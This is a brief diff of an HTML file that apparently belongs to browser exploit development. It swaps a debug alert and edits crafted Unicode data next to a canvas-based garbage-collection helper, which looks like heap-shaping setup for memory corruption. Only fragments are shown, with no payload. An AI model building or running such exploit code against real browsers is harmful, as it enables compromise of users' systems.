--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start1");
+alert("start2");
 function gc() {
     try {
         var c = document.createElement("canvas");
@@ -32,7 +32,7 @@ c += c;
 }
 var d="\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000"+
       "\u7000\u0000\u7000\u0000\u0000\u0000\u0000\u0000"+
-      "\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\uFFFF\u0000"+
+      "\uBBBB\uFFFF\uFFFF\uFFFF\u0000\u0000\u0000\u0000"+
       "\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000"+
       "\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000"+
       "\u0000\u0000\u8000\u0000\u0000\u0000\u0000\u0000";
